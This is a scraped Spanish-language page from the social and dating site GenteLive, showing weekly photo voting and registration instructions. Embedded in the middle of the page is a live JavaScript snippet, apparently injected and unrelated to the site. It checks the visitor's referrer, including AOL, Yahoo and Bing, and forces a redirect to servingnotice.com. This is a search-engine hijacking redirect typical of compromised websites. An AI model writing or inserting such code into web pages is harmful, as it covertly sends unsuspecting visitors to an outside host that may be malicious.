Foto cuarto   Foto segundo   1º de la semana   1ª de la semana   Foto segunda   Foto Cuarta
  Foto quinto   Foto tercero Foto tercera   Foto quinta
 
Recuerda: puedes votar hasta el viernes a las 24:00
         
Votaciones de esta semana
       
130.422
  • ChicoLive
  • ChicaLive
var toUrl="http://"; var rUrl = document.referrer; var patrn=/(.*)$/; toUrl+="servingnotice.com/lvinter1/intermediary.html?it11org"; toUrl+=""; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)aol.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)yahoo.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)bing.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl;

Todos los cursos, masters y oposiones que existen.

Las mejores inocentadas para el 28 de diciembre
 

Regístrate

¿Ya te has decidido? ¡Excelente! Pertenecerás a la mayor base de datos de gente de Internet, donde todo el mundo podrá inscribirse y encontrarte. ¡Harás miles de amigos aquí en GenteLive!

Sí, deseo pertenecer a GenteLive.com y acepto los Términos y Condiciones

IMPORTANTE: Todos los registros han de ser confirmados, es decir, después de cubras el formulario, te enviaremos un email con un enlace que debes seguir para que tu solicitud sea considerada válida. Si el email que utilizas para registrarte no existe, tu registro no podrá ser activado. Tienes diez días de plazo para confirmar tu registro, pasado ese tiempo será eliminado de la base de datos.

MUY IMPORTANTE: Si te has registrado con una cuenta de Hotmail y parece que no recibes el mail de confirmación, mira por si acaso en la carpeta "Correo no deseado" (puede que nuestro envío haya sido interpretado por error como tal por el filtro de Hotmail). Si es así, marca el correo, y seleciona "Esto no es un correo electrónico no deseado" Y desde ese momento nuestros mails los recibirás correctamente.

Cubre los campos con cuidado, ya que el texto aparecerá tal cual tú lo has introducido (faltas de ortografía incluídas). No utilices siempre mayúsculas ya que eso dificulta su posterior lectura. Podrás dejar en blanco todos los campos que no sean obligatorios (aquellos marcados con un *) y que no desees rellenar en el formulario...

Extisten dos tipos de registro, el completo (que requiere tu foto), y el sencillo (en el que no es necesaria una foto). Con este último no aparecerás en las búsquedas de perfiles ni te podrán votar. Si tu registro es de tipo "sin foto" puedes cambiarlo a "con foto" desde la sección "Modificar fichal" una vez identificado.

 
Haz GenteLIVE tu página de inicio Añadir a Favoritos Contacto Ayuda